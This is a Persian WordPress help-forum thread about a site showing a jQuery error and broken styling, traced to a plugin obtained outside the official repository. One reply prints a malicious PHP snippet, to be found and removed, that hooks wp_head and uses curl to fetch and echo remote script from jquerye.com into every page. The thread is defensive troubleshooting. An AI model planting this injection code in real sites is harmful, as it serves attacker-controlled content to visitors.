رفتن به مطلب

ارور jquerye در سایت و بهم ریختن تمامی سایت

پست های پیشنهاد شده

با سلام

من 2 روزه که با این مشکل مواجه شدم

هیچ افزونه ای جدیدا اضافه نکردم ، و تا چند روز پیش همه چی درست کار می کرد ، ولی الان بالای صفحه ارور نشون می ده ، و فونت ها و رنگ ها هم بهم ریخته

با سرور هم تماس گرفتم و گفتند مشکل از طرف هاست نیست

ممنون می شم کمکم کنید

http://achromatopsy.com/

لینک به ارسال

نه ، من 10 روز بود که هیچ تغییری نداده بودم ، و تو این مدت درست کار می کرد . ولی بدون هیچ دلیلی الان دو روزه که این پیغام رو نشون می ده و قالب بهم ریخته

لینک به ارسال

بدافزار روی پوسته/سایت شما وجود داره.

توی کدهای سایتتون جستجو کنید و کد زیر رو حذف کنید:

<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>

اگر نبود بدنبال کد زیر باشید:

add_action('wp_head', 'insert_jquery_slider')

لینک به ارسال

ممنون ، ولی همه جا رو سرچ کردم ، ولی همچین کدی و یا نزدیک به این هم پیدا نکردم .

ممکنه کد دیگه ای باشه؟

لینک به ارسال

من شروع کردم همه افزونه هامو غیر فعال کردم . و الان افزونه Uber Audio رو غیر فعال کردم و درست شد

من این افزونه رو 1 ماه پیش نصب کرده بودم ، ومشکلی نداده بود . نمی دونم چرا باعث این مسئله شده

ممنون اقای مرتضی ، می شه بگید چطور می تونم از این بدافزار ها جلوگیری کنم ؟

لینک به ارسال

پلاگین هاتون رو تاجایی که شده از مخزن وردپرس دریافت کنید. سرچی که من کردم ، این پلاگین در مخزن وردپرس نبود. میتونه یکی از دلایل باشه.

البته بعضی اوقات برخی پلاگین ها با هم و با یک سری توابع قالب مشکل ساز میشن.

لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

• اضافه کردن...